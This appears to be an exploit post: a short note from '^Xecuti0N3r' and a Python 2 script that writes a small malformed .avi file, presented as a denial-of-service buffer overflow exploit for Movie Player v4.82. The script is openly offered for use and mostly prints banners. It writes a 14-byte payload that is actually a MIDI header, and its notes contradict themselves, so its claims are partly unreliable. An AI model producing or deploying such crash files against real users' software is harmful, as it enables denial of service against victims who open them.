Hello Team,
I have attached a file MoviePlayerExploit.py which exploits the memory vulnerability in Movie Player v4.82 which can be used to perform a Denial of Service attack :) and to cause a crash.
To run this file, compile the MoviePlayerExploit.py using python and then you may open the generated exploit ".avi" file using Movie Player v4.82. If run properly, many a times, there is a crash every-time whenever the victim opens the folder in which the Exploit is placed.
Thanks and Regards,
^Xecuti0N3r
#!/usr/bin/python
#(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit
#(+)Software Link: http://www.movieplay.org/download.php
#(+)Software : Movie Player
#(+)Version : v4.82
#(+)Tested On : WIN-XP SP3
#(+) Date : 31.03.2011
#(+) Hour : 3:37 PM
#Similar Bug was found by cr4wl3r in MediaPlayer Classic
print " _______________________________________________________________________";
print "(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit";
print "(+) Software Link: http://www.movieplay.org/download.php";;
print "(+) Software : Movie Player";
print "(+) Version : v4.82";
print "(+) Tested On : WIN-XP SP3";
print "(+) Date : 31.03.2011";
print "(+) Hour : 13:37 PM ";
print "____________________________________________________________________\n ";
import time
time.sleep (2);
print "\nGenerating the exploit file !!!";
time.sleep (2);
print "\n\nMoviePlayerExploit.avi file generated!!";
time.sleep (2);
ExploitLocation = "C:\\MoviePlayerExploit.avi"
f = open(ExploitLocation, "wb")
memoryloc ='\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00';
f.write(memoryloc)
f.close()
print "\n\n(+) Done!\n";
print "(+) Now Just open MoviePlayerExploit.avi with Movie Player and Kaboooommm !! ;) \n";
print "(+) Most of the times there is a crash\n whenever you open the folder where the MoviePlayerExploit.avi is stored :D \n";
time.sleep (2);
time.sleep (1);
print "\n\n\n########################################################################\n (+)Exploit Coded by: ^Xecuti0N3r & d3M0l!tioN3r \n";
print "(+)^Xecuti0N3r: E-mail \n";
print "(+)d3M0l!tioN3r: E-mail \n";
print "(+)Special Thanks to: MaxCaps & aNnIh!LatioN3r \n";
print "########################################################################\n\n";
time.sleep (4);
